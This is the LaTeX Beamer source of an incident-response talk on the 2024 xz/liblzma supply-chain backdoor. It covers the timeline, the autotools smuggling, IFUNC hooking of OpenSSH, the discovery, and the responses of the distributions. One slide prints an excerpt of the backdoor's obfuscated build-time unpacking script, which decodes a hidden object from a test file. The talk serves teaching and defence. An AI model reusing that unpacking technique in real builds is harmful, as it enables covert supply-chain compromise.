%% SPDX-License-Identifier: CC0-1.0
%%
%% Copyright (C) 2024 W. Kosior <koszko@koszko.org>
\documentclass{beamer}
\usetheme{Rochester}
\usecolortheme{seagull}
\usepackage{calc}
\usepackage{svg}
\usepackage{graphicx}
\usepackage[export]{adjustbox}
\usepackage{verbatimbox}
\usepackage{listings}
\usepackage{seqsplit}
\usepackage{soul}

\setbeamertemplate{navigation symbols}{}
%\setbeameroption{show notes}
\setbeameroption{show only notes}

% prettyitemize: an ordinary itemize list whose entries are separated by
% 0.7em of extra vertical space.  Used for the bullet lists on the slides.
\newenvironment{prettyitemize}{%
  \begin{itemize}%
    \setlength{\itemsep}{0.7em}%
}{%
  \end{itemize}%
}

% \newcommand{\meme}[1]{%
%   \href{#1}{Meme \includesvg[height=\baselineskip]{Awesome.svg}}
% }

% \memeframe{<title>}{<url>}: a frame titled "<title> (Meme)" whose only
% content is a centred, \Huge link produced by \meme{<url>}.
% NOTE(review): \meme is commented out just above, and every \memeframe call
% in this file is commented out as well.  Re-enabling a call without first
% restoring \meme stops the build with an undefined control sequence.
\newcommand{\memeframe}[2]{%
  \begin{frame}{#1 (Meme)}
    \begin{center}
      \Huge
      \meme{#2}
    \end{center}
  \end{frame}
}

% \screenshotframe{<title>}{<file>}: a frame titled <title> that shows the
% image screenshots/<file>, scaled to the text height minus 0.5cm.
% The `center' key is not a plain graphicx key; it is made available to
% \includegraphics by loading adjustbox with the [export] option.
\newcommand{\screenshotframe}[2]{%
  \begin{frame}{#1}
    \includegraphics[
      height=\dimexpr\textheight-0.5cm\relax,
      center
    ]{screenshots/#2}
  \end{frame}
}

\title{Incident response — 2024 xz backdoor}
\subtitle{
  Wojciech Kosior \& Krzysztof Ambroży
}
\begin{document}

\frame{
  \titlepage
  \begin{figure}[h]
    \includegraphics[height=0.25\textheight]{xz-logo.png}
  \end{figure}
}

\note{
  \begin{itemize}
  \item a popular free software package ``xz''
  \item we'll discuss
    \begin{itemize}
    \item how it happened
    \item briefly: how backdoor works
    \item how it was discovered \& analyzed
    \item various reactions, employed procedures
    \item discussions and triggered changes in projects (lessons learned)
    \end{itemize}
  \end{itemize}
}

\begin{frame}{Meet xz}
  \begin{prettyitemize}
  \item xz's what?
    \pause
  \item xz's who?
    \vspace{0.5em}
    \pause
    \begin{prettyitemize}
    \item
      {\raisebox{-2ex}{\includegraphics[height=\dimexpr\baselineskip*2\relax]{avatar-larhzu.png}}}
      Lasse Collin (\textit{Larhzu}) \pause
    \item
      {\raisebox{-2ex}{\includegraphics[height=\dimexpr\baselineskip*2\relax]{avatar-jia.png}}}
      Jia Cheong Tan (\textit{JiaT75})
    \end{prettyitemize}
  \end{prettyitemize}
  \pause
  \vspace{2em}
  % \begin{center}
  %   \meme{https://i0.wp.com/lex-img-p.s3.us-west-2.amazonaws.com/img/5ddde247-464a-4532-bfe4-5e0a1ed16062-RackMultipart20240407-179-1kxtsc.png?ssl=1}
  % \end{center}
\end{frame}

\note{
  \scalebox{0.75}{\begin{minipage}{1.333\textwidth}
      \begin{itemize}
      \item ``xz'' — a (lossless) compression tool
        \begin{itemize}
        \item started in 2009
        \item includes both CLI application and library ``lzma'' (which was
          standalone before 2009)
        \item free/libre software (developed on GitHub, viewable by anyone)
        \item included by default in many operating systems (almost all
          GNU+Linux distros like Debian and Ubuntu)
        \end{itemize}
      \item xz is Lasse Collin
        \begin{itemize}
        \item Lasse has been the maintainer since the beginning in 2009
        \item Lasse got less involved with the project lately (personal
          problems)
        \item Lasse often had internet breaks (including when backdoor got
          placed)
        \end{itemize}
      \item xz is (was…) Jia Tan
        \begin{itemize}
        \item relatively new co-maintainer
        \item 2-2.5 years as a contributor
        \item 1.5 years with release rights
        \item DO NOT \textbf{YET} explain that backdoor-activating code is
          absent in git or that Jia is a fake identity
        \end{itemize}
      \end{itemize}
  \end{minipage}}
}

\begin{frame}{Timeline}
  \includesvg[
    width=\linewidth,
    inkscapelatex=false
  ]{timeline.svg}
\end{frame}

\note{
  \begin{itemize}
  \item before January 2022 — contributions to other projects
  \item April 2022 — certain ``Jigar Kumar'' and ``Dennis Ens'' start criticizing
    Lasse on the mailing list for not being able to take care of the project
    well; both appear to be fake identities
  \item XZ Utils 5.6.1 got released to hide Valgrind errors manifesting
    because of the backdoor
  \item April 9 — Larhzu unbanned on GitHub, starts cleaning up the GitHub
    project
  \item maybe explain what tarball signing is
  \end{itemize}
}

\screenshotframe{Hit the news}{news-theregister.png}

\note{
  \begin{itemize}
  \item backdoor placed by Jia in 2024
  \item XZ versions 5.6.0 and 5.6.1
  \item discovered on March 29th
  \item became loud news (not just technical sites/blogs)
  \end{itemize}
}

\begin{frame}{Meet target audience}
  It's best to attack the most popular…

  \begin{center}
    \begin{figure}[h]
      \includesvg[
        width=\linewidth,
        inkscapelatex=false
      ]{target-audience-distros.svg}
    \end{figure}
  \end{center}
\end{frame}

\note{
  \begin{itemize}
  \item affected: GNU+Linux distros using systemd, based on APT or RPM
    \begin{itemize}
    \item Debian, Ubuntu, Kali
    \item Fedora, RedHat
    \item (Open)Suse,
    \item their other derivatives
    \end{itemize}
  \item unaffected (at this time…)
    \begin{itemize}
    \item Arch
    \item Gentoo
    \item Nix \& Guix
    \item Alpine
    \item non-Linux-based OSes (BSDs, macOS)
    \end{itemize}
  \end{itemize}
}

\begin{frame}{Meet targeted programs}
  \begin{prettyitemize}
  \item OpenSSH (SSH daemon)
    \pause
  \item systemd
    \pause
  \item glibc
  \end{prettyitemize}
\end{frame}

\note{
  \scalebox{0.75}{\begin{minipage}{1.333\textwidth}
      \begin{itemize}
      \item OpenSSH (OpenBSD Secure Shell)
        \begin{itemize}
        \item used for remote management
        \item commonly deployed on UNIX servers
        \item daemon listens for connections on TCP (default port 22)
        \item typically handles logins and spawns a shell (like bash) on remote host
          (although other uses exist)
        \item typically has great privileges (session creation as different UNIX
          users)
        \item often receives attention (e.g. created sessions likely to be logged)
        \end{itemize}
      \item systemd
        \begin{itemize}
        \item an init system (the first program started by the kernel when
          computer boots)
        \item also a service management tool
        \item used on most mainstream GNU+Linux distros
        \item often criticized for bloat
        \end{itemize}
      \item glibc (GNU C Library)
        \begin{itemize}
        \item used on most mainstream GNU+Linux distros
        \item utilized by most of the programs on the system
        \item also often criticized for bloat
        \end{itemize}
      \end{itemize}
  \end{minipage}}
}

\begin{frame}{Autotools}
  \begin{center}
    \begin{figure}[h]
      \includesvg[
        width=\linewidth,
        inkscapelatex=false
      ]{autotools.svg}
    \end{figure}
  \end{center}
\end{frame}

\begin{myverbbox}{\vMakefile}Makefile\end{myverbbox}
\begin{myverbbox}{\vconfigureAc}configure.ac\end{myverbbox}
\begin{myverbbox}{\vMakefileAm}Makefile.am\end{myverbbox}
\begin{myverbbox}{\vconfigure}configure\end{myverbbox}
\begin{myverbbox}{\vMakefileIn}Makefile.in\end{myverbbox}

\note{
  \scalebox{0.75}{\begin{minipage}{1.333\textwidth}
      \begin{itemize}
      \item GNU Autotools — Autoconf + Automake + some other programs
      \item used to configure how program should be built and to generate a
        {\vMakefile}
      \item steps:
        \begin{itemize}
        \item maintainer writes {\vconfigureAc} and {\vMakefileAm}
        \item maintainer uses a command from Autoconf to generate a
          {\vconfigure} script and a {\vMakefileIn}
        \item the project together with generated files is packed into a tarball
          and distributed
        \item user downloads the distribution tarball
        \item user runs the {\vconfigure} script to generate {\vMakefile}
        \item user runs Make to build the program
        \end{itemize}
      \item after downloading, user can optionally re-generate the {\vconfigure}
        and a {\vMakefileIn} files to avoid relying on upstream-generated ones
      \item common if user $\equiv$ a distro
      \item functionality often extended with custom M4 files
      \item they are often simply copied from other projects
      \end{itemize}
  \end{minipage}}
}

\begin{frame}{Autotools — Backdoor smuggling}
  \begin{center}
    \begin{figure}[h]
      \includesvg[
        width=\linewidth,
        inkscapelatex=false
      ]{autotools-and-backdoor.svg}
    \end{figure}
  \end{center}
\end{frame}

\begin{myverbbox}{\vBuildToHost}m4/build-to-host.m4\end{myverbbox}

\begin{myverbbox}{\vBadCorruptLzma}tests/files/bad-3-corrupt_lzma2.xz\end{myverbbox}

\begin{myverbbox}{\vGoodLargeCompressed}tests/files/good-large_compressed.lzma\end{myverbbox}

  \note{
    \scalebox{0.75}{\begin{minipage}{1.333\textwidth}
        \begin{itemize}
        \item extra {\vBuildToHost} copied from the gnulib project and included
          in xz release tarballs
        \item modified to alter the build in a malicious way
        \item works even if the victim re-generates the {\vconfigure} file
        \item other malicious files (not shown) hidden among test resources
        \item programs have automated tests
        \item xz is a compression tool — tests involve decompression of archives
        \item {\vBuildToHost} extracts a hidden shell script from
          {\vBadCorruptLzma} (otherwise unused)
        \item extracted script further alters the build to link a binary payload
          into the program
        \item binary payload hidden in {\vGoodLargeCompressed} (also unused)
        \item {\vBuildToHost} not present \& backdoor inactive when building
          from git
        \end{itemize}
    \end{minipage}}
  }

\begin{frame}[fragile]{Backdoor unpacking}
  \ttfamily\small
  \begin{lstlisting}[breaklines]
xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<4096;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
if ! test -f liblzma_la-crc64-fast.o; then
exit 0
fi
cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true
  \end{lstlisting}
\end{frame}

\note{
  \begin{itemize}
  \item only a small part of the script shown here, some extra line-breaks added
  \item the script
    \begin{itemize}
    \item checks the environment
    \item gets the payload linked into liblzma.so
    \item but only when using GCC, glibc, building an APT/RPM package, etc.
    \item but even when this is not met, looks for magic numbers in other files
      and tries to execute their embedded payloads if found (an entry for future
      backdoors)
    \end{itemize}
  \item explain what shared library is
  \item lots of obfuscation (as seen in the slide)
  \end{itemize}
}

\begin{myverbbox}{\vRSAPublicDecyrpt}RSA_public_decrypt\end{myverbbox}

\begin{frame}{Backdoor loading}
  \begin{itemize}
  \item many popular distros patch OpenSSH server to use systemd notifications
  \item systemd depends on lzma
  \item liblzma gets loaded into OpenSSH process and replaces function
    {\vRSAPublicDecyrpt} with its own implementation utilizing ``IFUNC'' functionality of glibc
  % \item uses ``IFUNC''
  \end{itemize}
\end{frame}
% \begin{frame}{Backdoor loading}
\note{
  % \begin{itemize}
  % \item in many distros OpenSSH happens to be patched to use systemd
  %   notifications
  % \item systemd depends on lzma
  % \item liblzma gets loaded into OpenSSH process and replaces function
  %   {\vRSAPublicDecyrpt} with its own
  % \item uses ``IFUNC''
  % \end{itemize}

  % \vspace{1em}

  % \itshape
  ``The GNU indirect function support (IFUNC) is a feature of the GNU toolchain
  that allows a developer to create multiple implementations of a given function
  and to select amongst them at runtime using a resolver function which is also
  written by the developer. The resolver function is called by the dynamic
  loader during early startup to resolve which of the implementations will be
  used by the application.''
  \normalfont
% \end{frame}
}
\note{
  \begin{itemize}
  \item systemd depends on lzma
  \item liblzma gets loaded into OpenSSH process and replaces function
    {\vRSAPublicDecyrpt} with its own
  \item hijacking a function in another library not normally easy — global
    offset table and procedure linkage tables are made read-only after process
    is initialized
  \item IFUNCs abused to bypass the above and run code while said tables are
    still writable
  \end{itemize}
}

\begin{frame}{Backdoor exploiting}
  \begin{center}
    \begin{figure}[h]
      \includesvg[
        width=\linewidth,
        inkscapelatex=false
      ]{openssh-exploitation.svg}
    \end{figure}
  \end{center}
\end{frame}

\begin{myverbbox}{\vSystem}system()\end{myverbbox}

\note{
  \begin{itemize}
  \item upon SSH connection using certificate, backdoor checks for a specific
    key
  \item payload extracted from cert's public key before cert's sig verification
  \item theoretically, others could exploit this attack as well (though the
    check for the attacker's specific key means this would require that key)
  \item runs code using {\vSystem} function from C library (no extra SSH session
    spawned)
  \item again, lots of obfuscation
  \end{itemize}
}

\screenshotframe{Discovery}{andres-mastodon.png}

\note{
  \begin{itemize}
  \item Postgres developer, employed by Microsoft
  \item had been working on Postgres using backdoored Debian Unstable
  \item noticed SSH running slower
  \item notified GNU+Linux distros
  \item one of the most famous programmers now
  \end{itemize}
}

% \memeframe{Discovery}{https://media.telefonicatech.com/telefonicatech/uploads/2024/4/downgrade-xz-meme.jpg}

\screenshotframe{Reactions — Debian}{reactions-dsa.png}

\note{
  \begin{itemize}
  \item Debian $\equiv$ primary distro user of APT
  \item Debian unstable and testing affected (i.e. releases not usually meant
    for production use)
  \item older xz release numbered with newer version for automatic reversion
    even with an ordinary update (the ``+really-5.4.5-1'' version suffix makes
    it lexicographically greater than the vulnerable package without suffix)
  \item users subscribed to the security mailing list were notified on the day
    of discovery
  \end{itemize}
}

\screenshotframe{Reactions — Ubuntu}{reactions-ubuntu.png}

\note{
  \begin{itemize}
  \item the most popular Debian-derived distro
  \item maybe the most popular GNU+Linux distro overall
  \item only the not-yet-released Ubuntu 24.04 affected
  \item CVE recorded and library removed from repos on the day of backdoor
    discovery
  \end{itemize}
}

\screenshotframe{Reactions — Kali}{reactions-kali.png}

\note{
  \begin{itemize}
  \item one of few distros to have served the backdoored version to the general
    public rather than beta testers
  \item probably not the desired target of the attacker (Kali is not meant for
    servers)
  \item unlike OpenSUSE Tumbleweed, did not recommend that affected users
    reinstall the system despite the backdoor being truly active
  \end{itemize}
}

\screenshotframe{Reactions — Fedora}{reactions-fedora.png}

\begin{myverbbox}{\vDnfUpgradeAdvisory}sudo dnf upgrade --refresh \
--advisory=FEDORA-2024-d02c7bb266\end{myverbbox}

\note{
  \begin{itemize}
  \item Fedora $\equiv$ primary distro user of RPM, base for RedHat
  \item ``PLEASE IMMEDIATELY STOP USAGE OF ANY FEDORA RAWHIDE INSTANCES''
  \item only Fedora Linux 40 beta and Fedora Rawhide affected
  \item note: Rawhide is a development/testing release, Fedora Linux 40 beta is
    a beta release; neither is meant for most kinds of production tasks
  \item users nevertheless encouraged to downgrade to a version from before
    Jia's xz maintainer access
  \item package version lowered but epoch bumped (maybe smarter than Debian's
    solution?)
  \item {\vDnfUpgradeAdvisory}
  \end{itemize}
}

\screenshotframe{Reactions — OpenSUSE}{reactions-opensuse.png}

\begin{myverbbox}{\vOpenSUSERevertto}5.6.1.revertto5.4\end{myverbbox}

\note{
  \begin{itemize}
  \item also an RPM user, base for commercial SUSE distro
  \item OpenSUSE Tumbleweed (rolling release variant of OpenSUSE) — one of the
    major affected distros (March 8 - March 28)
  \item users who had SSH exposed recommended to install afresh
  \item package created with version {\vOpenSUSERevertto}
  \end{itemize}
}

\screenshotframe{Reactions — Gentoo}{reactions-gentoo.png}

\note{
  \begin{itemize}
  \item reaction also on the same day
  \item distro not affected
  \item reverted to earlier xz release nevertheless
  \item users requested to downgrade nevertheless
  \item distro recently started linking lzma into packages by default, which
    raised suspicion (but is clearly a coincidence)
  \item other unaffected distros (e.g. Arch) reacted similarly
  \end{itemize}
}

\screenshotframe{Reactions — Microsoft}{reactions-microsoft.png}

\note{
  While not known for involvement with GNU+Linux distros, Microsoft also has
  an interest in them and wrote posts about the backdoor.
}

\screenshotframe{Reactions — Official Bodies}{reactions-cisa.png}

\note{
  \begin{itemize}
  \item CISA - Cybersecurity \& Infrastructure Security Agency
  \item a US agency
  \item gave similar advice as distro maintainers — to downgrade xz
  \end{itemize}
}

\screenshotframe{Lasse Collin's xz repo cleanup}{lasse-cleanup-commit.png}

\screenshotframe{New release without backdoor (2 weeks ago)}{new-release.png}

\note{
  \scalebox{0.75}{\begin{minipage}{1.333\textwidth}
      \begin{itemize}
      \item Lasse unbanned on GitHub on April 2 (3 days after backdoor
        discovery)
      \item XZ repo cleaned up and reinstated on April 9
      \item Lasse has also been documenting the situation on
        \href{https://tukaani.org/xz-backdoor/}{https://tukaani.org/xz-backdoor/}
      \item good for Lasse, people got interested in xz, many compassionate with
        him and offered donations or other help
      \item Jia disappeared, it's been noticed he had been
        \begin{itemize}
        \item making commits on Chinese New Year which most Chinese don't
        \item spelling his ``second name'' in a Singaporean rather than Chinese
          way
        \item using a Singaporean VPN for all communication
        \item using +0800 timezone for most of his commits but had also made
          some with +0300 timezone
        \item working on xz during typical working hours of the +0300 timezone
        \item but had also often worked on weekends
        \item inactive during some western holiday
        \end{itemize}
      \item Jia could be a fake Singaporean persona created and operated by the
        Russian or Iranian government
      \item but could as well be created and operated by a US agency in a way to
        suggest Russian involvement
      \end{itemize}
    \end{minipage}}
}

\begin{myverbbox}{\vLd}ld\end{myverbbox}
\begin{myverbbox}{\vObjdump}objdump\end{myverbbox}

\begin{frame}{Lessons Learned}
  \begin{prettyitemize}
  \item Decided to change their practices to mitigate attacks of this kind:
    \begin{prettyitemize}
    \item CMake (the other build system supported by xz)
    \item systemd (the init system rumoured to be bloated)
    \item groff (typesetting system using Autotools)
    \item GNU binutils (mainstream implementation of tools like {\vLd} and
      {\vObjdump})
    \item openSSH
    \end{prettyitemize}
  \item Had interesting discussions as a result of the attack: autoconf,
    automake, bug-gnulib, fedora-devel, debian-devel, oss-security
  \item Universal advice: put SSH behind VPN
  \end{prettyitemize}
\end{frame}

\note{
  \begin{itemize}
  \item CMake — check for feature tests made to be forcibly-failing (Jia made
    Linux landlock availability check fail by introducing syntax error in test C
    source)
  \item systemd — has already been working on reducing dependencies like xz
  \item groff — better practices: allow more files to be rebuilt by distribution
  \item GNU binutils — better practices: strip dependencies
  \item openSSH — look for solutions so that distros don't have to patch
    anything
  \end{itemize}

  Among other things, supply chain hardening methods were discussed.  Should we
  rely on vcs rather than on tarballs?  Should we create our tarballs in some
  more responsible way?
}

% \memeframe{Lessons Learned}{https://redlib.pussthecat.org/img/j8wcm4aajprc1.jpeg}

\begin{frame}{References}
  \small

  Resources used:
  \begin{prettyitemize}
  \item \href{https://tukaani.org/xz-backdoor/}{\ttfamily\seqsplit{https://tukaani.org/xz-backdoor/}}
  \item \href{https://www.openwall.com/lists/oss-security/2024/03/29/4}{\ttfamily\seqsplit{https://www.openwall.com/lists/oss-security/2024/03/29/4}}
  \item \href{https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27}{\ttfamily\seqsplit{https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27}}
  \item \href{https://www.theregister.com/2024/03/29/malicious_backdoor_xz/}{\ttfamily\seqsplit{https://www.theregister.com/2024/03/29/malicious\_backdoor\_xz/}}
  \item \href{https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b}{\ttfamily\seqsplit{https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b}}
  \end{prettyitemize}
\end{frame}

\begin{frame}{Credits}
  \begin{center}
    Thank you for your attention :)
  \end{center}

  \small

  \vspace{0.5em}

  And thanks to the graphics folks…
  \begin{prettyitemize}
  \item XZ logo — \st{Copyright (C) 2023 Jia Tan} made by haxxors behind the
    backdoor, distributed under the
    \href{https://creativecommons.org/licenses/by-sa/4.0/}{CC-BY-SA-4.0} license
  % \item Awesome ``emoji'' — by Openclipart user rones, uploaded 2011 (released
  %   into public domain with
  %   \href{https://creativecommons.org/publicdomain/zero/1.0/legalcode.en}{CC
  %     Zero v1.0})
  \item the original Autotools diagram — Copyright (C) 2001-2024 Gentoo Authors,
    distributed under the
    \href{https://creativecommons.org/licenses/by-sa/4.0/}{CC-BY-SA-4.0}
    license
  \item Virus image — by Openclipart user utrescu, uploaded 2012 (released into
    public domain with
    \href{https://creativecommons.org/publicdomain/zero/1.0/legalcode.en}{CC
      Zero v1.0})
  \end{prettyitemize}

  \vspace{0.5em}

  You can find this presentation's sources here
  \begin{center}
    \href{https://git.koszko.org/AGH-xz-backdoor-presentation/}{https://git.koszko.org/AGH-xz-backdoor-presentation/}
  \end{center}
\end{frame}

\end{document}